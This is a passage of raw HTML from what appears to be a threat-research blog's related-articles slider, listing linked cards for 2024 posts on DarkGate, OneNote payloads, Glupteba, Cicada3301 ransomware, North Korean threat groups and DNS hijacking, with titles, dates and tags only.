              </div>
            </div><div class="pa l-card l-card--slider slick-slide" style="width: 301px;" data-slick-index="4" aria-hidden="true" tabindex="-1">
              <div class="card-media ">
                              <figure>
                <img width="786" height="368" data-src="https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/06_Malware_Category_1920x900-786x368.jpg" class="lozad" alt="Person in a blurred motion is working on a computer with screen showing lines of code, emphasizing a dynamic and intense focus on software development or programming in a dimly lit room." decoding="async" data-srcset="https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/06_Malware_Category_1920x900-786x368.jpg 786w, https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/06_Malware_Category_1920x900-1493x700.jpg 1493w, https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/06_Malware_Category_1920x900-768x360.jpg 768w, https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/06_Malware_Category_1920x900-1536x720.jpg 1536w, https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/06_Malware_Category_1920x900.jpg 1920w" sizes="(max-width: 786px) 100vw, 786px">                </figure> 
                            </div>
              <div class="card-content">
                <div class="card-content__wrapper">
                  <a class="card-category" href="https://unit42.paloaltonetworks.com/category/threat-research/" role="link" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:related-resources:DarkGate: Dancing the Samba With Alluring Excel Files:Threat Research" tabindex="-1"><span class=""><img class="lozad" data-src="https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg" alt=" category icon">Threat Research</span></a>                        <span class="post-pub-date"><time datetime="2024-07-10T19:00:54+00:00">July 10, 2024</time></span>
                  <a href="https://unit42.paloaltonetworks.com/darkgate-malware-uses-excel-files/" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:related-resources:DarkGate: Dancing the Samba With Alluring Excel Files" tabindex="-1">
                    <h4 class="post-title">DarkGate: Dancing the Samba With Alluring Excel Files</h4>
                  </a>
                  <ul class="card-tags" role="list">
				<li role="listitem">
					<a href="https://unit42.paloaltonetworks.com/tag/sandbox/" title="Sandbox" role="link" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:related-resources:DarkGate: Dancing the Samba With Alluring Excel Files:Sandbox" tabindex="-1">Sandbox</a>
				</li>
				<li role="listitem">
					<a href="https://unit42.paloaltonetworks.com/tag/microsoft-excel/" title="Microsoft Excel" role="link" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:related-resources:DarkGate: Dancing the Samba With Alluring Excel Files:Microsoft Excel" tabindex="-1">Microsoft Excel</a>
				</li>
				<li role="listitem">
					<a href="https://unit42.paloaltonetworks.com/tag/malware-as-a-service/" title="malware-as-a-service" role="link" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:related-resources:DarkGate: Dancing the Samba With Alluring Excel Files:malware-as-a-service" tabindex="-1">Malware-as-a-service</a>
				</li></ul>                </div>
                <div class="card-content__link">
                                    <a class="hyperlink" href="https://unit42.paloaltonetworks.com/darkgate-malware-uses-excel-files/" title="DarkGate: Dancing the Samba With Alluring Excel Files" role="link" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:related-resources:DarkGate: Dancing the Samba With Alluring Excel Files:read now" tabindex="-1">
                    Read now                    <img src="https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg" alt="Right arrow">
                  </a>
                </div>
              </div>
            </div><div class="pa l-card l-card--slider slick-slide" style="width: 301px;" data-slick-index="5" aria-hidden="true" tabindex="-1">
              <div class="card-media ">
                              <figure>
                <img width="786" height="368" data-src="https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/Generic-B-1920x900-1-786x368.png" class="lozad" alt="Constellation image representing the constellation schema used by Palo Alto Networks Unit 42 to track nation-state and cybercrime threat actor groups" decoding="async" data-srcset="https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/Generic-B-1920x900-1-786x368.png 786w, https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/Generic-B-1920x900-1-1493x700.png 1493w, https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/Generic-B-1920x900-1-768x360.png 768w, https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/Generic-B-1920x900-1-1536x720.png 1536w, https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/Generic-B-1920x900-1.png 1920w" sizes="(max-width: 786px) 100vw, 786px">                </figure> 
                            </div>
              <div class="card-content">
                <div class="card-content__wrapper">
                  <a class="card-category" href="https://unit42.paloaltonetworks.com/category/threat-actor-groups/" role="link" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:related-resources:Threat Actor Groups Tracked by Palo Alto Networks Unit 42:Threat Actor Groups" tabindex="-1"><span class=""><img class="lozad" data-src="https://unit42.paloaltonetworks.com/wp-content/uploads/2024/07/threat-actor-groups.svg" alt=" category icon">Threat Actor Groups</span></a>                        <span class="post-pub-date"><time datetime="2024-06-28T01:00:15+00:00">June 27, 2024</time></span>
                  <a href="https://unit42.paloaltonetworks.com/threat-actor-groups-tracked-by-palo-alto-networks-unit-42/" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:related-resources:Threat Actor Groups Tracked by Palo Alto Networks Unit 42" tabindex="-1">
                    <h4 class="post-title">Threat Actor Groups Tracked by Palo Alto Networks Unit 42</h4>
                  </a>
                  <ul class="card-tags" role="list">
				<li role="listitem">
					<a href="https://unit42.paloaltonetworks.com/tag/academic-serpens/" title="Academic Serpens" role="link" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:related-resources:Threat Actor Groups Tracked by Palo Alto Networks Unit 42:Academic Serpens" tabindex="-1">Academic Serpens</a>
				</li>
				<li role="listitem">
					<a href="https://unit42.paloaltonetworks.com/tag/agent-serpens/" title="Agent Serpens" role="link" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:related-resources:Threat Actor Groups Tracked by Palo Alto Networks Unit 42:Agent Serpens" tabindex="-1">Agent Serpens</a>
				</li>
				<li role="listitem">
					<a href="https://unit42.paloaltonetworks.com/tag/agonizing-serpens/" title="Agonizing Serpens" role="link" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:related-resources:Threat Actor Groups Tracked by Palo Alto Networks Unit 42:Agonizing Serpens" tabindex="-1">Agonizing Serpens</a>
				</li></ul>                </div>
                <div class="card-content__link">
                                    <a class="hyperlink" href="https://unit42.paloaltonetworks.com/threat-actor-groups-tracked-by-palo-alto-networks-unit-42/" title="Threat Actor Groups Tracked by Palo Alto Networks Unit 42" role="link" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:related-resources:Threat Actor Groups Tracked by Palo Alto Networks Unit 42:read now" tabindex="-1">
                    Read now                    <img src="https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg" alt="Right arrow">
                  </a>
                </div>
              </div>
            </div><div class="pa l-card l-card--slider slick-slide" style="width: 301px;" data-slick-index="6" aria-hidden="true" tabindex="-1">
              <div class="card-media ">
                              <figure>
                <img width="786" height="368" data-src="https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/03_Malware_Category_1920x900-786x368.jpg" class="lozad" alt="A laptop on a desk displaying a vibrant graphical interface with a circular red pattern, possibly representing cybersecurity or data analysis. The laptop is illuminated by the screen’s glow in a dimly lit room, which also shows a blurred background suggesting a secondary monitor and small desk objects." decoding="async" data-srcset="https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/03_Malware_Category_1920x900-786x368.jpg 786w, https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/03_Malware_Category_1920x900-1493x700.jpg 1493w, https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/03_Malware_Category_1920x900-768x360.jpg 768w, https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/03_Malware_Category_1920x900-1536x720.jpg 1536w, https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/03_Malware_Category_1920x900.jpg 1920w" sizes="(max-width: 786px) 100vw, 786px">                </figure> 
                            </div>
              <div class="card-content">
                <div class="card-content__wrapper">
                  <a class="card-category" href="https://unit42.paloaltonetworks.com/category/threat-research/" role="link" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:related-resources:Payload Trends in Malicious OneNote Samples:Threat Research" tabindex="-1"><span class=""><img class="lozad" data-src="https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg" alt=" category icon">Threat Research</span></a>                        <span class="post-pub-date"><time datetime="2024-05-16T10:00:02+00:00">May 16, 2024</time></span>
                  <a href="https://unit42.paloaltonetworks.com/payloads-in-malicious-onenote-samples/" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:related-resources:Payload Trends in Malicious OneNote Samples" tabindex="-1">
                    <h4 class="post-title">Payload Trends in Malicious OneNote Samples</h4>
                  </a>
                  <ul class="card-tags" role="list">
				<li role="listitem">
					<a href="https://unit42.paloaltonetworks.com/tag/malvertising/" title="malvertising" role="link" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:related-resources:Payload Trends in Malicious OneNote Samples:malvertising" tabindex="-1">Malvertising</a>
				</li>
				<li role="listitem">
					<a href="https://unit42.paloaltonetworks.com/tag/microsoft-onenote/" title="Microsoft OneNote" role="link" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:related-resources:Payload Trends in Malicious OneNote Samples:Microsoft OneNote" tabindex="-1">Microsoft OneNote</a>
				</li>
				<li role="listitem">
					<a href="https://unit42.paloaltonetworks.com/tag/phishing/" title="phishing" role="link" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:related-resources:Payload Trends in Malicious OneNote Samples:phishing" tabindex="-1">Phishing</a>
				</li></ul>                </div>
                <div class="card-content__link">
                                    <a class="hyperlink" href="https://unit42.paloaltonetworks.com/payloads-in-malicious-onenote-samples/" title="Payload Trends in Malicious OneNote Samples" role="link" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:related-resources:Payload Trends in Malicious OneNote Samples:read now" tabindex="-1">
                    Read now                    <img src="https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg" alt="Right arrow">
                  </a>
                </div>
              </div>
            </div><div class="pa l-card l-card--slider slick-slide" style="width: 301px;" data-slick-index="7" aria-hidden="true" tabindex="-1">
              <div class="card-media ">
                              <figure>
                <img width="786" height="393" data-src="https://unit42.paloaltonetworks.com/wp-content/uploads/2024/02/banner-blog-786x393.png" class="lozad" alt="Zoomed in Unit 42 logo." decoding="async" data-srcset="https://unit42.paloaltonetworks.com/wp-content/uploads/2024/02/banner-blog-786x393.png 786w, https://unit42.paloaltonetworks.com/wp-content/uploads/2024/02/banner-blog-1400x700.png 1400w, https://unit42.paloaltonetworks.com/wp-content/uploads/2024/02/banner-blog-768x384.png 768w, https://unit42.paloaltonetworks.com/wp-content/uploads/2024/02/banner-blog-1536x768.png 1536w, https://unit42.paloaltonetworks.com/wp-content/uploads/2024/02/banner-blog.png 2002w" sizes="(max-width: 786px) 100vw, 786px">                </figure> 
                            </div>
              <div class="card-content">
                <div class="card-content__wrapper">
                  <a class="card-category" href="https://unit42.paloaltonetworks.com/category/trend-reports/" role="link" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:related-resources:2024 Unit 42 Incident Response Report: Navigating the Shift in Cybersecurity Threat Tactics:Trend Reports" tabindex="-1"><span class=""><img class="lozad" data-src="https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-report-white-1.svg" alt=" category icon">Trend Reports</span></a>                        <span class="post-pub-date"><time datetime="2024-02-20T14:12:31+00:00">February 20, 2024</time></span>
                  <a href="https://unit42.paloaltonetworks.com/unit42-incident-response-report-2024-threat-guide/" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:related-resources:2024 Unit 42 Incident Response Report: Navigating the Shift in Cybersecurity Threat Tactics" tabindex="-1">
                    <h4 class="post-title">2024 Unit 42 Incident Response Report: Navigating the Shift in Cybersecurity Threat Tactics</h4>
                  </a>
                  <ul class="card-tags" role="list">
				<li role="listitem">
					<a href="https://unit42.paloaltonetworks.com/tag/aws/" title="AWS" role="link" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:related-resources:2024 Unit 42 Incident Response Report: Navigating the Shift in Cybersecurity Threat Tactics:AWS" tabindex="-1">AWS</a>
				</li>
				<li role="listitem">
					<a href="https://unit42.paloaltonetworks.com/tag/microsoft-azure/" title="Microsoft Azure" role="link" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:related-resources:2024 Unit 42 Incident Response Report: Navigating the Shift in Cybersecurity Threat Tactics:Microsoft Azure" tabindex="-1">Microsoft Azure</a>
				</li>
				<li role="listitem">
					<a href="https://unit42.paloaltonetworks.com/tag/muddled-libra/" title="Muddled Libra" role="link" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:related-resources:2024 Unit 42 Incident Response Report: Navigating the Shift in Cybersecurity Threat Tactics:Muddled Libra" tabindex="-1">Muddled Libra</a>
				</li></ul>                </div>
                <div class="card-content__link">
                                    <a class="hyperlink" href="https://unit42.paloaltonetworks.com/unit42-incident-response-report-2024-threat-guide/" title="2024 Unit 42 Incident Response Report: Navigating the Shift in Cybersecurity Threat Tactics" role="link" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:related-resources:2024 Unit 42 Incident Response Report: Navigating the Shift in Cybersecurity Threat Tactics:read now" tabindex="-1">
                    Read now                    <img src="https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg" alt="Right arrow">
                  </a>
                </div>
              </div>
            </div><div class="pa l-card l-card--slider slick-slide" style="width: 301px;" data-slick-index="8" aria-hidden="true" tabindex="-1">
              <div class="card-media ">
                              <figure>
                <img width="786" height="368" data-src="https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/02_Malware_Category_1920x900-786x368.jpg" class="lozad" alt="Close-up view of a digital screen displaying a distorted and pixelated image of a skull-like visage with a strong emphasis on blue and purple tones." decoding="async" data-srcset="https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/02_Malware_Category_1920x900-786x368.jpg 786w, https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/02_Malware_Category_1920x900-1493x700.jpg 1493w, https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/02_Malware_Category_1920x900-768x360.jpg 768w, https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/02_Malware_Category_1920x900-1536x720.jpg 1536w, https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/02_Malware_Category_1920x900.jpg 1920w" sizes="(max-width: 786px) 100vw, 786px">                </figure> 
                            </div>
              <div class="card-content">
                <div class="card-content__wrapper">
                  <a class="card-category" href="https://unit42.paloaltonetworks.com/category/threat-research/" role="link" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:related-resources:Diving Into Glupteba's UEFI Bootkit:Threat Research" tabindex="-1"><span class=""><img class="lozad" data-src="https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg" alt=" category icon">Threat Research</span></a>                        <span class="post-pub-date"><time datetime="2024-02-12T14:00:28+00:00">February 12, 2024</time></span>
                  <a href="https://unit42.paloaltonetworks.com/glupteba-malware-uefi-bootkit/" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:related-resources:Diving Into Glupteba's UEFI Bootkit" tabindex="-1">
                    <h4 class="post-title">Diving Into Glupteba's UEFI Bootkit</h4>
                  </a>
                  <ul class="card-tags" role="list">
				<li role="listitem">
					<a href="https://unit42.paloaltonetworks.com/tag/cryptocurrency-mining/" title="Cryptocurrency mining" role="link" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:related-resources:Diving Into Glupteba's UEFI Bootkit:Cryptocurrency mining" tabindex="-1">Cryptocurrency mining</a>
				</li>
				<li role="listitem">
					<a href="https://unit42.paloaltonetworks.com/tag/credential-stealer/" title="credential stealer" role="link" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:related-resources:Diving Into Glupteba's UEFI Bootkit:credential stealer" tabindex="-1">Credential stealer</a>
				</li>
				<li role="listitem">
					<a href="https://unit42.paloaltonetworks.com/tag/redline-infostealer/" title="Redline infostealer" role="link" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:related-resources:Diving Into Glupteba's UEFI Bootkit:Redline infostealer" tabindex="-1">Redline infostealer</a>
				</li></ul>                </div>
                <div class="card-content__link">
                                    <a class="hyperlink" href="https://unit42.paloaltonetworks.com/glupteba-malware-uefi-bootkit/" title="Diving Into Glupteba's UEFI Bootkit" role="link" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:related-resources:Diving Into Glupteba's UEFI Bootkit:read now" tabindex="-1">
                    Read now                    <img src="https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg" alt="Right arrow">
                  </a>
                </div>
              </div>
            </div><div class="pa l-card l-card--slider slick-slide slick-cloned" style="width: 301px;" data-slick-index="9" id="" aria-hidden="true" tabindex="-1">
              <div class="card-media ">
                              <figure>
                <img width="786" height="368" data-src="https://unit42.paloaltonetworks.com/wp-content/uploads/2024/11/02_DNS_Overview_1920x900-786x368.jpg" class="lozad" alt="Pictorial representation of detecting DNS hijacking. Digital illustration of a futuristic data center with glowing blue server racks connected by light beams, surrounded by cloud computing icons, set against a dark background." decoding="async" data-srcset="https://unit42.paloaltonetworks.com/wp-content/uploads/2024/11/02_DNS_Overview_1920x900-786x368.jpg 786w, https://unit42.paloaltonetworks.com/wp-content/uploads/2024/11/02_DNS_Overview_1920x900-1493x700.jpg 1493w, https://unit42.paloaltonetworks.com/wp-content/uploads/2024/11/02_DNS_Overview_1920x900-768x360.jpg 768w, https://unit42.paloaltonetworks.com/wp-content/uploads/2024/11/02_DNS_Overview_1920x900-1536x720.jpg 1536w, https://unit42.paloaltonetworks.com/wp-content/uploads/2024/11/02_DNS_Overview_1920x900.jpg 1920w" sizes="(max-width: 786px) 100vw, 786px">                </figure> 
                            </div>
              <div class="card-content">
                <div class="card-content__wrapper">
                  <a class="card-category" href="https://unit42.paloaltonetworks.com/category/threat-research/" role="link" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:related-resources:Automatically Detecting DNS Hijacking in Passive DNS:Threat Research" tabindex="-1"><span class=""><img class="lozad" data-src="https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg" alt=" category icon">Threat Research</span></a>                        <span class="post-pub-date"><time datetime="2024-11-04T23:00:48+00:00">November 4, 2024</time></span>
                  <a href="https://unit42.paloaltonetworks.com/detect-dns-hijacking-passive-dns/" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:related-resources:Automatically Detecting DNS Hijacking in Passive DNS" tabindex="-1">
                    <h4 class="post-title">Automatically Detecting DNS Hijacking in Passive DNS</h4>
                  </a>
                  <ul class="card-tags" role="list">
				<li role="listitem">
					<a href="https://unit42.paloaltonetworks.com/tag/domain-hijacking/" title="domain hijacking" role="link" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:related-resources:Automatically Detecting DNS Hijacking in Passive DNS:domain hijacking" tabindex="-1">Domain hijacking</a>
				</li></ul>                </div>
                <div class="card-content__link">
                                    <a class="hyperlink" href="https://unit42.paloaltonetworks.com/detect-dns-hijacking-passive-dns/" title="Automatically Detecting DNS Hijacking in Passive DNS" role="link" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:related-resources:Automatically Detecting DNS Hijacking in Passive DNS:read now" tabindex="-1">
                    Read now                    <img src="https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg" alt="Right arrow">
                  </a>
                </div>
              </div>
            </div><div class="pa l-card l-card--slider slick-slide slick-cloned" style="width: 301px;" data-slick-index="10" id="" aria-hidden="true" tabindex="-1">
              <div class="card-media ">
                              <figure>
                <img width="786" height="368" data-src="https://unit42.paloaltonetworks.com/wp-content/uploads/2024/09/06_Ransomware_Category_1920x900-786x368.jpg" class="lozad" alt="A pictorial representation of Cicada3301 ransomware. Digital rendering of a transparent padlock superimposed with programming code and placed on a network of connected databases, symbolizing cybersecurity and data protection." decoding="async" data-srcset="https://unit42.paloaltonetworks.com/wp-content/uploads/2024/09/06_Ransomware_Category_1920x900-786x368.jpg 786w, https://unit42.paloaltonetworks.com/wp-content/uploads/2024/09/06_Ransomware_Category_1920x900-1493x700.jpg 1493w, https://unit42.paloaltonetworks.com/wp-content/uploads/2024/09/06_Ransomware_Category_1920x900-768x360.jpg 768w, https://unit42.paloaltonetworks.com/wp-content/uploads/2024/09/06_Ransomware_Category_1920x900-1536x720.jpg 1536w, https://unit42.paloaltonetworks.com/wp-content/uploads/2024/09/06_Ransomware_Category_1920x900.jpg 1920w" sizes="(max-width: 786px) 100vw, 786px">                </figure> 
                            </div>
              <div class="card-content">
                <div class="card-content__wrapper">
                  <a class="card-category" href="https://unit42.paloaltonetworks.com/category/top-cyberthreats/" role="link" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:related-resources:Threat Assessment: Repellent Scorpius, Distributors of Cicada3301 Ransomware:High Profile Threats" tabindex="-1"><span class=""><img class="lozad" data-src="https://unit42.paloaltonetworks.com/wp-content/uploads/2024/07/top-threats.svg" alt=" category icon">High Profile Threats</span></a>                        <span class="post-pub-date"><time datetime="2024-09-10T10:00:08+00:00">September 10, 2024</time></span>
                  <a href="https://unit42.paloaltonetworks.com/repellent-scorpius-cicada3301-ransomware/" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:related-resources:Threat Assessment: Repellent Scorpius, Distributors of Cicada3301 Ransomware" tabindex="-1">
                    <h4 class="post-title">Threat Assessment: Repellent Scorpius, Distributors of Cicada3301 Ransomware</h4>
                  </a>
                  <ul class="card-tags" role="list">
				<li role="listitem">
					<a href="https://unit42.paloaltonetworks.com/tag/raas/" title="RaaS" role="link" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:related-resources:Threat Assessment: Repellent Scorpius, Distributors of Cicada3301 Ransomware:RaaS" tabindex="-1">RaaS</a>
				</li>
				<li role="listitem">
					<a href="https://unit42.paloaltonetworks.com/tag/data-exfiltration/" title="data exfiltration" role="link" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:related-resources:Threat Assessment: Repellent Scorpius, Distributors of Cicada3301 Ransomware:data exfiltration" tabindex="-1">Data exfiltration</a>
				</li>
				<li role="listitem">
					<a href="https://unit42.paloaltonetworks.com/tag/leak-site/" title="Leak site" role="link" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:related-resources:Threat Assessment: Repellent Scorpius, Distributors of Cicada3301 Ransomware:Leak site" tabindex="-1">Leak site</a>
				</li></ul>                </div>
                <div class="card-content__link">
                                    <a class="hyperlink" href="https://unit42.paloaltonetworks.com/repellent-scorpius-cicada3301-ransomware/" title="Threat Assessment: Repellent Scorpius, Distributors of Cicada3301 Ransomware" role="link" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:related-resources:Threat Assessment: Repellent Scorpius, Distributors of Cicada3301 Ransomware:read now" tabindex="-1">
                    Read now                    <img src="https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg" alt="Right arrow">
                  </a>
                </div>
              </div>
            </div><div class="pa l-card l-card--slider slick-slide slick-cloned" style="width: 301px;" data-slick-index="11" id="" aria-hidden="true" tabindex="-1">
              <div class="card-media ">
                              <figure>
                <img width="786" height="368" data-src="https://unit42.paloaltonetworks.com/wp-content/uploads/2024/09/Pisces-NK-A-1920x900-1-786x368.png" class="lozad" alt="Illustrative image featuring two fish and the Pisces constellation superimposed on a stylized, abstract background with flowing purple waves and a starry night sky." decoding="async" data-srcset="https://unit42.paloaltonetworks.com/wp-content/uploads/2024/09/Pisces-NK-A-1920x900-1-786x368.png 786w, https://unit42.paloaltonetworks.com/wp-content/uploads/2024/09/Pisces-NK-A-1920x900-1-1493x700.png 1493w, https://unit42.paloaltonetworks.com/wp-content/uploads/2024/09/Pisces-NK-A-1920x900-1-768x360.png 768w, https://unit42.paloaltonetworks.com/wp-content/uploads/2024/09/Pisces-NK-A-1920x900-1-1536x720.png 1536w, https://unit42.paloaltonetworks.com/wp-content/uploads/2024/09/Pisces-NK-A-1920x900-1.png 1920w" sizes="(max-width: 786px) 100vw, 786px">                </figure> 
                            </div>
              <div class="card-content">
                <div class="card-content__wrapper">
                  <a class="card-category" href="https://unit42.paloaltonetworks.com/category/top-cyberthreats/" role="link" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:related-resources:Threat Assessment: North Korean Threat Groups:High Profile Threats" tabindex="-1"><span class=""><img class="lozad" data-src="https://unit42.paloaltonetworks.com/wp-content/uploads/2024/07/top-threats.svg" alt=" category icon">High Profile Threats</span></a>                        <span class="post-pub-date"><time datetime="2024-09-09T22:00:58+00:00">September 9, 2024</time></span>
                  <a href="https://unit42.paloaltonetworks.com/threat-assessment-north-korean-threat-groups-2024/" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:related-resources:Threat Assessment: North Korean Threat Groups" tabindex="-1">
                    <h4 class="post-title">Threat Assessment: North Korean Threat Groups</h4>
                  </a>
                  <ul class="card-tags" role="list">
				<li role="listitem">
					<a href="https://unit42.paloaltonetworks.com/tag/north-korea/" title="North Korea" role="link" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:related-resources:Threat Assessment: North Korean Threat Groups:North Korea" tabindex="-1">North Korea</a>
				</li>
				<li role="listitem">
					<a href="https://unit42.paloaltonetworks.com/tag/remote-access-trojan/" title="Remote Access Trojan" role="link" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:related-resources:Threat Assessment: North Korean Threat Groups:Remote Access Trojan" tabindex="-1">Remote Access Trojan</a>
				</li>
				<li role="listitem">
					<a href="https://unit42.paloaltonetworks.com/tag/finance/" title="Finance" role="link" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:related-resources:Threat Assessment: North Korean Threat Groups:Finance" tabindex="-1">Finance</a>
				</li></ul>                </div>
                <div class="card-content__link">
                                    <a class="hyperlink" href="https://unit42.paloaltonetworks.com/threat-assessment-north-korean-threat-groups-2024/" title="Threat Assessment: North Korean Threat Groups" role="link" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:related-resources:Threat Assessment: North Korean Threat Groups:read now" tabindex="-1">
                    Read now                    <img src="https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg" alt="Right arrow">
                  </a>
                </div>
              </div>
            </div><div class="pa l-card l-card--slider slick-slide slick-cloned" style="width: 301px;" data-slick-index="12" id="" aria-hidden="true" tabindex="-1">
              <div class="card-media ">
                              <figure>
                <img width="786" height="368" data-src="https://unit42.paloaltonetworks.com/wp-content/uploads/2024/02/03_Ransomware_Category_1920x900-786x368.jpg" class="lozad" alt="Pictorial representation of ransomware activity in the first half of 2024. A digitial illustration of a lock made up of nodes glowing against a background of bokeh points." decoding="async" data-srcset="https://unit42.paloaltonetworks.com/wp-content/uploads/2024/02/03_Ransomware_Category_1920x900-786x368.jpg 786w, https://unit42.paloaltonetworks.com/wp-content/uploads/2024/02/03_Ransomware_Category_1920x900-1493x700.jpg 1493w, https://unit42.paloaltonetworks.com/wp-content/uploads/2024/02/03_Ransomware_Category_1920x900-768x360.jpg 768w, https://unit42.paloaltonetworks.com/wp-content/uploads/2024/02/03_Ransomware_Category_1920x900-1536x720.jpg 1536w, https://unit42.paloaltonetworks.com/wp-content/uploads/2024/02/03_Ransomware_Category_1920x900.jpg 1920w" sizes="(max-width: 786px) 100vw, 786px">                </figure> 
                            </div>
              <div class="card-content">
                <div class="card-content__wrapper">
                  <a class="card-category" href="https://unit42.paloaltonetworks.com/category/trend-reports/" role="link" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:related-resources:Ransomware Review: First Half of 2024:Trend Reports" tabindex="-1"><span class=""><img class="lozad" data-src="https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-report-white-1.svg" alt=" category icon">Trend Reports</span></a>                        <span class="post-pub-date"><time datetime="2024-08-09T10:00:03+00:00">August 9, 2024</time></span>
                  <a href="https://unit42.paloaltonetworks.com/unit-42-ransomware-leak-site-data-analysis/" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:related-resources:Ransomware Review: First Half of 2024" tabindex="-1">
                    <h4 class="post-title">Ransomware Review: First Half of 2024</h4>
                  </a>
                  <ul class="card-tags" role="list">
				<li role="listitem">
					<a href="https://unit42.paloaltonetworks.com/tag/healthcare/" title="Healthcare" role="link" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:related-resources:Ransomware Review: First Half of 2024:Healthcare" tabindex="-1">Healthcare</a>
				</li>
				<li role="listitem">
					<a href="https://unit42.paloaltonetworks.com/tag/lockbit/" title="LockBit" role="link" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:related-resources:Ransomware Review: First Half of 2024:LockBit" tabindex="-1">LockBit</a>
				</li>
				<li role="listitem">
					<a href="https://unit42.paloaltonetworks.com/tag/ransomhub/" title="RansomHub" role="link" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:related-resources:Ransomware Review: First Half of 2024:RansomHub" tabindex="-1">RansomHub</a>
				</li></ul>                </div>
                <div class="card-content__link">
                                    <a class="hyperlink" href="https://unit42.paloaltonetworks.com/unit-42-ransomware-leak-site-data-analysis/" title="Ransomware Review: First Half of 2024" role="link" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:related-resources:Ransomware Review: First Half of 2024:read now" tabindex="-1">
